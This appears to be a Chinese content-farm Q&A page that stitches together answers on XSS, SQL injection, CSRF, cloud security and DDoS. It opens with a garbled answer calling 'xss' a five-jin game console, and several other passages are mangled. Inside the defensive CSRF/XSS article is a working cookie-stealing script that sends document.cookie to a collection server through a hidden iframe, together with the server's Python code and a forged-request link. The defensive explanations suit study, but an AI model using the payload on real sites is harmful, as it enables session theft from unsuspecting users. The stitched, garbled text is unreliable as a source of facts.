游戏机xss几斤

5斤。

游戏机xss5斤。据外媒G *** Arena消息，如果能在亚马逊上市，那么游戏机xss很可能是比较重的游戏机。根据德国亚马逊上目前列出的PS5规格来看，xss的重量为5斤。

我做的网站被漏洞检测说是有什么xss跨站脚本漏洞，怎么修复啊，哪位大侠帮看看！！

你这个页面我没看出来有xss啊，倒是有可能有sql注入漏洞。Title变量要过滤一下啊，要不用户可能会修改Title的内容，比如插入一个单引号，后面跟上自己的sql语句，这样会导致查到一些不该看到的数据库内容，引发注入漏洞。所以，要过滤一些用户提交的数据，把特殊字符全滤掉，百度一些啊asp防注入，有源码的。

xss，假设我是攻击者，我把提交数据的一个变量修改为‘aaaaaaaaaaaa’（post或则get提交的都可以，因为你是request接收的），然后看页面中回显‘aaaaaaaaaaaa’的位置。如果出现了，我可以尝试修改一下加入“”等，破坏掉你的html结构，如果可以破坏，那么我就可以插入javascript代码“script src=.../script”。盗取用户的cookies（所以cookies更好只用httponly），结合beef甚至操作用户的浏览器（权限和功能很低的，别想多了）。

综上所述，你写源码时，必须要检查所有用户可以修改和提交的数据（包括cookies等http头里面的），然后在输出点做好编码。输入与输出控制好了可以减免很多麻烦。

还可以使用安全宝、知道创于等公司提供的云waf服务，这样用户提交的数据会由他们检测，并且给你做好了cdn加速。注意的是，不要把你真实的ip暴露在网上。有的人只做www.test.com的解析，没有做test.com的解析，导致真实ip暴露在网上。

或者使用一些开源的cms，asp的我不了解，php的我知道有wordpress，代码写的很不错了，只要你定期更新版本，不乱下载一些插件（插件都是别人提交的，编程水平不一定很好所以），一般不会出什么大的漏洞。插件也要定期更新。

防止旁站，找主机服务商时要注意（找大的和好的），亚马逊这样的，每个站的权限都是控制的很死的，所以很难提权。

至于社工，安全是一种意识，慢慢培养吧。我了解的就这些了，希望能对你有帮助。

云计算的安全性具体包含哪些内容

云计算安全联盟(CSA)发布的报告总结了云计算安全面临的9种威胁。在这其中，数据泄露、数据丢失和数据劫持三类威胁排名靠前。

安全威胁1:数据泄露

为了表明数据泄露对企业的危害程度，CSA在报告中提到了其在2012年11月发表的一篇研究文章，该文章描述了黑客如何利用边信道(Side-Channel)时间信息，通过侵入一台虚拟机来获取同一服务器上的其他虚拟机所使用的私有密钥。不过，其实不怀好意的黑客未必需要如此煞费苦心，就能确保这种攻击得逞。要是多租户云服务数据库设计不当，哪怕某一个用户的应用程序只存在一个漏洞，都可以让攻击者获取这个用户的数据，而且还能获取其他用户的数据。

安全威胁2:数据丢失

CSA认为，云计算环境的第二大威胁是数据丢失。用户有可能会眼睁睁地看着那些宝贵数据消失得无影无踪，但是却对此毫无办法。不怀好意的黑客会删除攻击对象的数据。粗心大意的服务提供商或者灾难(如大火、洪水或地震)也可能导致用户的数据丢失。让情况更为严峻的是，要是用户丢失了加密密钥，那么对数据进行加密的行为反而会给用户带来麻烦。

安全威胁3: 数据劫持

第三大云计算安全风险是账户或服务流量被劫持。CSA认为，云计算在这方面增添了一个新的威胁。如果黑客获取了企业的登录资料，其就有可能窃听相关活动和交易，并操纵数据、返回虚假信息，将企业客户引到非法网站。报告表示：“你的账户或服务实例可能成为攻击者新的大本营。他们进而会利用你的良好信誉，对外发动攻击。”CSA在报告中提到了2010年亚马逊曾遭遇到的跨站脚本(XSS)攻击。

安全威胁4:不安全的接口

第四大安全威胁是不安全的接口(API)。IT管理员们会利用API对云服务进行配置、管理、协调和监控。API对一般云服务的安全性和可用性来说极为重要。企业和第三方因而经常在这些接口的基础上进行开发，并提供附加服务。CSA在报告中表示：“这为接口管理增加了复杂度。由于这种做法会要求企业将登录资料交给第三方，以便相互联系，因此其也加大了风险。”

安全威胁5: 拒绝服务攻击

分布式拒绝服务(DDoS)被列为云计算面临的第五大安全威胁。多年来，DDoS一直都是互联网的一大威胁。而在云计算时代，许多企业会需要一项或多项服务保持7×24小时的可用性，在这种情况下这个威胁显得尤为严重。DDoS引起的服务停用会让服务提供商失去客户，还会给按照使用时间和磁盘空间为云服务付费的用户造成惨重损失。

安全威胁6: 不怀好意的“临时工”

第六大威胁是不怀好意的内部人员，这些人可能是在职或离任的员工、合同工或者业务合作伙伴。他们会不怀好意地访问 *** 、系统或数据。在云服务设计不当的场景下，不怀好意的内部人员可能会造成较大的破坏。从基础设施即服务(IaaS)、平台即服务(PaaS)到软件即服务(SaaS)，不怀好意的内部人员拥有比外部人员更高的访问级别，因而得以接触到重要的系统，最终访问数据。

安全威胁7:滥用云服务

第七大安全威胁是云服务滥用，比如坏人利用云服务破解普通计算机很难破解的加密密钥。另一个例子是，恶意黑客利用云服务器发动分布式拒绝服务攻击、传播恶意软件或共享盗版软件。

安全威胁8:贸然行事

第八大云计算安全威胁是调查不够充分，也就是说，企业还没有充分了解云计算服务商的系统环境及相关风险，就贸然采用云服务。因此，企业进入到云端需要与服务提供商签订合同，明确责任和透明度方面的问题。此外，如果公司的开发团队对云技术不够熟悉，就把应用程序贸然放到云端，可能会由此出现运营和架构方面的问题。

安全威胁9:共享隔离问题

最后，CSA将共享技术的安全漏洞列为云计算所面临的第九大安全威胁。云服务提供商经常共享基础设施、平台和应用程序，并以一种灵活扩展的方式来交付服务。

前端安全方面有没有了解？xss和csrf如何攻防

在那个年代，大家一般用拼接字符串的方式来构造动态 SQL 语句创建应用，于是 SQL 注入成了很流行的攻击方式。在这个年代， 参数化查询 已经成了普遍用法，我们已经离 SQL 注入很远了。但是，历史同样悠久的 XSS 和 CSRF 却没有远离我们。由于之前已经对 XSS 很熟悉了，所以我对用户输入的数据一直非常小心。如果输入的时候没有经过 Tidy 之类的过滤，我一定会在模板输出时候全部转义。所以个人感觉，要避免 XSS 也是很容易的，重点是要“小心”。但最近又听说了另一种跨站攻击 CSRF ，于是找了些资料了解了一下，并与 XSS 放在一起做个比较。

XSS：脚本中的不速之客

XSS 全称“跨站脚本”，是注入攻击的一种。其特点是不对服务器端造成任何伤害，而是通过一些正常的站内交互途径，例如发布评论，提交含有 JavaScript 的内容文本。这时服务器端如果没有过滤或转义掉这些脚本，作为内容发布到了页面上，其他用户访问这个页面的时候就会运行这些脚本。

运行预期之外的脚本带来的后果有很多中，可能只是简单的恶作剧——一个关不掉的窗口：

1

2

3

while (true) {

alert("你关不掉我~");

也可以是盗号或者其他未授权的操作——我们来模拟一下这个过程，先建立一个用来收集信息的服务器：

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

#!/usr/bin/env python

#-*- coding:utf-8 -*-

跨站脚本注入的信息收集服务器

import bottle

app = bottle.Bottle()

plugin = bottle.ext.sqlite.Plugin(dbfile='/var/db/myxss.sqlite')

app.install(plugin)

@app.route('/myxss/')

def show(cookies, db):

SQL = 'INSERT INTO "myxss" ("cookies") VALUES (?)'

try:

db.execute(SQL, cookies)

except:

pass

return ""

if __name__ == "__main__":

app.run()

然后在某一个页面的评论中注入这段代码：

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

// 用 script type="text/javascript"/script 包起来放在评论中

(function(window, document) {

// 构造泄露信息用的 URL

var cookies = document.cookie;

var xssURIBase = "http://192.168.123.123/myxss/";

var xssURI = xssURIBase + window.encodeURI(cookies);

// 建立隐藏 iframe 用于通讯

var hideFrame = document.createElement("iframe");

hideFrame.height = 0;

hideFrame.width = 0;

hideFrame.style.display = "none";

hideFrame.src = xssURI;

// 开工

document.body.appendChild(hideFrame);

})(window, document);

于是每个访问到含有该评论的页面的用户都会遇到麻烦——他们不知道背后正悄悄的发起了一个请求，是他们所看不到的。而这个请求，会把包含了他们的帐号和其他隐私的信息发送到收集服务器上。

我们知道 AJAX 技术所使用的 XMLHttpRequest 对象都被浏览器做了限制，只能访问当前域名下的 URL，所谓不能“跨域”问题。这种做法的初衷也是防范 XSS，多多少少都起了一些作用，但不是总是有用，正如上面的注入代码，用 iframe 也一样可以达到相同的目的。甚至在愿意的情况下，我还能用 iframe 发起 POST 请求。当然，现在一些浏览器能够很智能地分析出部分 XSS 并予以拦截，例如新版的 Firefox、Chrome 都能这么做。但拦截不总是能成功，何况这个世界上还有大量根本不知道什么是浏览器的用户在用着可怕的 IE6。从原则上将，我们也不应该把事关安全性的责任推脱给浏览器，所以防止 XSS 的根本之道还是过滤用户输入。用户输入总是不可信任的，这点对于 Web 开发者应该是常识。

正如上文所说，如果我们不需要用户输入 HTML 而只想让他们输入纯文本，那么把所有用户输入进行 HTML 转义输出是个不错的做法。似乎很多 Web 开发框架、模版引擎的开发者也发现了这一点，Django 内置模版和 Jinja2 模版总是默认转义输出变量的。如果没有使用它们，我们自己也可以这么做。PHP 可以用 htmlspecialchars 函数，Python 可以导入 cgi 模块用其中的 cgi.escape 函数。如果使用了某款模版引擎，那么其必自带了方便快捷的转义方式。

真正麻烦的是，在一些场合我们要允许用户输入 HTML，又要过滤其中的脚本。Tidy 等 HTML 清理库可以帮忙，但前提是我们小心地使用。仅仅粗暴地去掉 script 标签是没有用的，任何一个合法 HTML 标签都可以添加 onclick 一类的事件属性来执行 JavaScript。对于复杂的情况，我个人更倾向于使用简单的 *** 处理，简单的 *** 就是白名单重新整理。用户输入的 HTML 可能拥有很复杂的结构，但我们并不将这些数据直接存入数据库，而是使用 HTML 解析库遍历节点，获取其中数据（之所以不使用 XML 解析库是因为 HTML 要求有较强的容错性）。然后根据用户原有的标签属性，重新构建 HTML 元素树。构建的过程中，所有的标签、属性都只从白名单中拿取。这样可以确保万无一失——如果用户的某种复杂输入不能为解析器所识别（前面说了 HTML 不同于 XML，要求有很强的容错性），那么它不会成为漏网之鱼，因为白名单重新整理的策略会直接丢弃掉这些未能识别的部分。最后获得的新 HTML 元素树，我们可以拍胸脯保证——所有的标签、属性都来自白名单，一定不会遗漏。

现在看来，大多数 Web 开发者都了解 XSS 并知道如何防范，往往大型的 XSS 攻击（包括前段时间新浪微博的 XSS 注入）都是由于疏漏。我个人建议在使用模版引擎的 Web 项目中，开启（或不要关闭）类似 Django Template、Jinja2 中“默认转义”（Auto Escape）的功能。在不需要转义的场合，我们可以用类似 的方式取消转义。这种白名单式的做法，有助于降低我们由于疏漏留下 XSS 漏洞的风险。

另外一个风险集中区域，是富 AJAX 类应用（例如豆瓣网的阿尔法城）。这类应用的风险并不集中在 HTTP 的静态响应内容，所以不是开启模版自动转义能就能一劳永逸的。再加上这类应用往往需要跨域，开发者不得不自己打开危险的大门。这种情况下，站点的安全非常 依赖开发者的细心和应用上线前有效的测试。现在亦有不少开源的 XSS 漏洞测试软件包（似乎有篇文章提到豆瓣网的开发也使用自动化 XSS 测试），但我都没试用过，故不予评价。不管怎么说，我认为从用户输入的地方把好关总是成本更低而又最有效的做法。

CSRF：冒充用户之手

起初我一直弄不清楚 CSRF 究竟和 XSS 有什么区别，后来才明白 CSRF 和 XSS 根本是两个不同维度上的分类。XSS 是实现 CSRF 的诸多途径中的一条，但绝对不是唯一的一条。一般习惯上把通过 XSS 来实现的 CSRF 称为 XSRF。

CSRF 的全称是“跨站请求伪造”，而 XSS 的全称是“跨站脚本”。看起来有点相似，它们都是属于跨站攻击——不攻击服务器端而攻击正常访问网站的用户，但前面说了，它们的攻击类型是不同维度上的分 类。CSRF 顾名思义，是伪造请求，冒充用户在站内的正常操作。我们知道，绝大多数网站是通过 cookie 等方式辨识用户身份（包括使用服务器端 Session 的网站，因为 Session ID 也是大多保存在 cookie 里面的），再予以授权的。所以要伪造用户的正常操作，更好的 *** 是通过 XSS 或链接欺骗等途径，让用户在本机（即拥有身份 cookie 的浏览器端）发起用户所不知道的请求。

严格意义上来说，CSRF 不能分类为注入攻击，因为 CSRF 的实现途径远远不止 XSS 注入这一条。通过 XSS 来实现 CSRF 易如反掌，但对于设计不佳的网站，一条正常的链接都能造成 CSRF。

例如，一论坛网站的发贴是通过 GET 请求访问，点击发贴之后 *** 把发贴内容拼接成目标 URL 并访问：

http://example.com/bbs/create_post.php?title=标题content=内容

那么，我只需要在论坛中发一帖，包含一链接：

http://example.com/bbs/create_post.php?title=我是脑残content=哈哈

只要有用户点击了这个链接，那么他们的帐户就会在不知情的情况下发布了这一帖子。可能这只是个恶作剧，但是既然发贴的请求可以伪造，那么删帖、转帐、改密码、发邮件全都可以伪造。

如何解决这个问题，我们是否可以效仿上文应对 XSS 的做法呢？过滤用户输入， 不允许发布这种含有站内操作 URL 的链接。这么做可能会有点用，但阻挡不了 CSRF，因为攻击者可以通过 *** 或其他网站把这个链接发布上去，为了伪装可能还使用 bit.ly 压缩一下网址，这样点击到这个链接的用户还是一样会中招。所以对待 CSRF ，我们的视角需要和对待 XSS 有所区别。CSRF 并不一定要有站内的输入，因为它并不属于注入攻击，而是请求伪造。被伪造的请求可以是任何来源，而非一定是站内。所以我们唯有一条路可行，就是过滤请求的 处理者。

比较头痛的是，因为请求可以从任何一方发起，而发起请求的方式多种多样，可以通过 iframe、ajax（这个不能跨域，得先 XSS）、Flash 内部发起请求（总是个大隐患）。由于几乎没有彻底杜绝 CSRF 的方式，我们一般的做法，是以各种方式提高攻击的门槛。

首先可以提高的一个门槛，就是改良站内 API 的设计。对于发布帖子这一类创建资源的操作，应该只接受 POST 请求，而 GET 请求应该只浏览而不改变服务器端资源。当然，最理想的做法是使用 REST 风格 的 API 设计，GET、POST、PUT、DELETE 四种请求 *** 对应资源的读取、创建、修改、删除。现在的浏览器基本不支持在表单中使用 PUT 和 DELETE 请求 *** ，我们可以使用 ajax 提交请求（例如通过 jquery-form 插件，我最喜欢的做法），也可以使用隐藏域指定请求 *** ，然后用 POST 模拟 PUT 和 DELETE （Ruby on Rails 的做法）。这么一来，不同的资源操作区分的非常清楚，我们把问题域缩小到了非 GET 类型的请求上——攻击者已经不可能通过发布链接来伪造请求了，但他们仍可以发布表单，或者在其他站点上使用我们肉眼不可见的表单，在后台用 js 操作，伪造请求。

接下来我们就可以用比较简单也比较有效的 *** 来防御 CSRF，这个 *** 就是“请求令牌”。读过《J2EE 核心模式》的同学应该对“同步令牌”应该不会陌生，“请求令牌”和“同步令牌”原理是一样的，只不过目的不同，后者是为了解决 POST 请求重复提交问题，前者是为了保证收到的请求一定来自预期的页面。实现 *** 非常简单，首先服务器端要以某种策略生成随机字符串，作为令牌（token）， 保存在 Session 里。然后在发出请求的页面，把该令牌以隐藏域一类的形式，与其他信息一并发出。在接收请求的页面，把接收到的信息中的令牌与 Session 中的令牌比较，只有一致的时候才处理请求，否则返回 HTTP 403 拒绝请求或者要求用户重新登陆验证身份。

请求令牌虽然使用起来简单，但并非不可破解，使用不当会增加安全隐患。使用请求令牌来防止 CSRF 有以下几点要注意：

虽然请求令牌原理和验证码有相似之处，但不应该像验证码一样，全局使用一个 Session Key。因为请求令牌的 *** 在理论上是可破解的，破解方式是解析来源页面的文本，获取令牌内容。如果全局使用一个 Session Key，那么危险系数会上升。原则上来说，每个页面的请求令牌都应该放在独立的 Session Key 中。我们在设计服务器端的时候，可以稍加封装，编写一个令牌工具包，将页面的标识作为 Session 中保存令牌的键。

在 ajax 技术应用较多的场合，因为很有请求是 JavaScript 发起的，使用静态的模版输出令牌值或多或少有些不方便。但无论如何，请不要提供直接获取令牌值的 API。这么做无疑是锁上了大门，却又把钥匙放在门口，让我们的请求令牌退化为同步令牌。

之一点说了请求令牌理论上是可破解的，所以非常重要的场合，应该考虑使用验证码（令牌的一种升级，目前来看破解难度极大），或者要求用户再次输入密码（亚马逊、 *** 的做法）。但这两种方式用户体验都不好，所以需要产品开发者权衡。

无论是普通的请求令牌还是验证码，服务器端验证过一定记得销毁。忘记销毁用过的令牌是个很低级但是杀伤力很大的错误。我们学校的选课系统就有这个 问题，验证码用完并未销毁，故只要获取一次验证码图片，其中的验证码可以在多次请求中使用（只要不再次刷新验证码图片），一直用到 Session 超时。这也是为何选课系统加了验证码，外挂软件升级一次之后仍然畅通无阻。

如下也列出一些据说能有效防范 CSRF，其实效果甚微的方式甚至无效的做法。

通过 referer 判定来源页面：referer 是在 HTTP Request Head 里面的，也就是由请求的发送者决定的。如果我喜欢，可以给 referer 任何值。当然这个做法并不是毫无作用，起码可以防小白。但我觉得性价比不如令牌。

过滤所有用户发布的链接：这个是最无效的做法，因为首先攻击者不一定要从站内发起请求（上面提到过了），而且就算从站内发起请求，途径也远远不知链接一条。比如 img src="./create_post.php" / 就是个不错的选择，还不需要用户去点击，只要用户的浏览器会自动加载图片，就会自动发起请求。 *在请求发起页面用 alert 弹窗提醒用户：这个 *** 看上去能干扰站外通过 iframe 发起的 CSRF，但攻击者也可以考虑用 window.alert = function(){}; 把 alert 弄哑，或者干脆脱离 iframe，使用 Flash 来达到目的。

总体来说，目前防御 CSRF 的诸多 *** 还没几个能彻底无解的。所以 CSDN 上看到讨论 CSRF 的文章，一般都会含有“ *** ”二字来形容（另一位有该名号的貌似是 DDOS 攻击）。作为开发者，我们能做的就是尽量提高破解难度。当破解难度达到一定程度，网站就逼近于绝对安全的位置了（虽然不能到达）。上述请求令牌 *** ，就我 认为是最有可扩展性的，因为其原理和 CSRF 原理是相克的。CSRF 难以防御之处就在于对服务器端来说，伪造的请求和正常的请求本质上是一致的。而请求令牌的 *** ，则是揪出这种请求上的唯一区别——来源页面不同。我们还可 以做进一步的工作，例如让页面中 token 的 key 动态化，进一步提高攻击者的门槛。本文只是我个人认识的一个总结，便不讨论过深了。

请教下大家，云原生计算环境的主要安全风险有哪些？

云原生计算环境的主要安全风险类型包括：云原生 *** 安全风险、云原生编排及组件安全风险、镜像安全风险、镜像仓库安全风险和容器逃逸攻击等类型，针对这些风险的防范建议还是去找有实力的安全服务厂商，我们公司现在合作的青藤云安全在这方面做的就非常不错，可以去了解下。

谁能说一下脚本病毒的原理、攻击流程与防护、、更好详细点呀、网站也好、谢啦、、

通过对xss跨站脚本攻击漏洞的历史、攻击特点、攻击原理描述及案例代码实战举例详细解析XSS漏洞攻击技术，并提出防御XSS跨站漏洞的思路 *** 。及WEB开发者开发网站过程中防范编码中产生xss跨站脚本攻击漏洞需要注意的事项。

XSS漏洞概述：

XSS(Cross Site Script)跨站点脚本攻击是一种注射的问题，在这种恶意脚本注入否则良性和信任的网站类型。跨站点脚本（XSS）攻击，攻击者使用时，会出现一个 *** 应用程序发送恶意代码，一般是在浏览器端脚本的形式，向不同的最终用户。这些缺陷，使攻击成功是相当普遍，发生在任何地方从一个Web应用程序使用在输出它没有验证或编码了用户输入。攻击者可以使用XSS的恶意脚本发送到一个毫无戒心的用户。最终用户的浏览有没有办法知道该脚本不应该信任，将执行该脚本。因为它认为该脚本来从一个受信任的源，恶意脚本可以访问任何Cookie，会话令牌，或其他敏感信息的浏览器保留，并与该网站使用。 甚至可以重写这些脚本的HTML网页的内容。

XSS漏洞历史：

XSS(Cross-site scripting)漏洞最早可以追溯到1996年，那时电子商务才刚刚起步，估计那时候国内很少人会想象到今天出现的几个国内电子商务巨头 *** 、当当、亚马逊（卓越）。XSS的出现“得益”于JavaScript的出现，JavaScript的出现给网页的设计带来了无限惊喜，包括今天风行的AJAX(Asynschronous JavaScript and XML)。同时，这些元素又无限的扩充了今天的 *** 安全领域。

XSS 漏洞攻击特点：

（1）XSS跨站漏洞种类多样人：

XSS攻击语句可插入到、URL地址参数后面、输入框内、img标签及DIV标签等HTML函数的属人里、Flash的getURL()动作等地方都会触发XSS漏洞。

（2）XSS跨站漏洞代码多样人：

为了躲避转义HTML特殊字符函数及过滤函数的过滤，XSS跨站的代码使用“/”来代替安字符“””、使用Tab键代替空格、部分语句转找成16进制、添加特殊字符、改变大小写及使用空格等来绕过过滤函数。

如果在您的新闻系统发现安全漏洞，如果该漏洞是一个SQL 注入漏洞，那么该漏洞就会得到您的网站管理员密码、可以在主机系统上执行shell命令、对数据库添加、删除数据。如果在您的新闻或邮件系统中发现安全漏洞，如果该漏洞是一个XSS跨站漏洞，那么可以构造一些特殊代码，只要你访问的页面包含了构造的特殊代码，您的主机可能就会执行木马程序、执行^***Cookies代码、突然转到一个银行及其它金融类的网站、泄露您的网银及其它账号与密码等。

XSS攻击原理：

XSS 属于被动式的攻击。攻击者先构造一个跨站页面，利用script、IMG、IFRAME等各种方式使得用户浏览这个页面时，触发对被攻击站点的http 请求。此时，如果被攻击者如果已经在被攻击站点登录，就会持有该站点cookie。这样该站点会认为被攻击者发起了一个http 请求。而实际上这个请求是在被攻击者不知情的情况下发起的，由此攻击者在一定程度上达到了冒充被攻击者的目的。精心的构造这个攻击请求，可以达到冒充发文，夺取权限等等多个攻击目的。在常见的攻击实例中，这个请求是通过script 来发起的，因此被称为Cross Site Script。攻击Yahoo Mail 的Yamanner 蠕虫是一个著名的XSS 攻击实例。Yahoo Mail 系统有一个漏洞，当用户在web 上察看信件时，有可能执行到信件内的javascript 代码。病毒可以利用这个漏洞使被攻击用户运行病毒的script。同时Yahoo Mail 系统使用了Ajax技术，这样病毒的script 可以很容易的向Yahoo Mail 系统发起ajax 请求，从而得到用户的地址簿，并发送病毒给他人。

XSS 攻击主要分为两类：一类是来自内部的攻击，主要指的是利用WEB 程序自身的漏洞，提交特殊的字符串，从而使得跨站页面直接存在于被攻击站点上，这个字符串被称为跨站语句。这一类攻击所利用的漏洞非常类似于SQL Injection 漏洞，都是WEB程序没有对用户输入作充分的检查和过滤。上文的Yamanner 就是一例。

另一类则是来来自外部的攻击，主要指的自己构造XSS 跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点，我们自己构造一个跨站网页放在自己的服务器上，然后通过结合其它技术，如社会工程学等，欺骗目标服务器的管理员打开。这一类攻击的威胁相对较低，至少ajax 要发起跨站调用是非常困难的。

我的网站扫描后有xss 和post漏洞这个是甚么意思！

很多防护软件都可以修复漏洞的.

比如说:腾讯电脑管家.他不光能修复电脑系统的漏洞,还有其他强大的功能.

电脑管家具有定期体检、及时修复漏洞、实时防护功能，同时拥有管理软件、查杀木马、系统优化、帐号保护、硬件检测、软件搬家等功能!

步骤：打开腾讯电脑管家修补漏洞扫描漏洞一键修复即可。

希望能够帮到你~

xss攻击h和ddos攻击的区别

XSS攻击：跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。

分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DDoS攻击，从而成倍地提高拒绝服务攻击的威力。通常，攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上，在一个设定的时间主控程序将与大量 *** 程序通讯， *** 程序已经被安装在 *** 上的许多计算机上。 *** 程序收到指令时就发动攻击。利用客户/服务器技术，主控程序能在几秒钟内激活成百上千次 *** 程序的运行。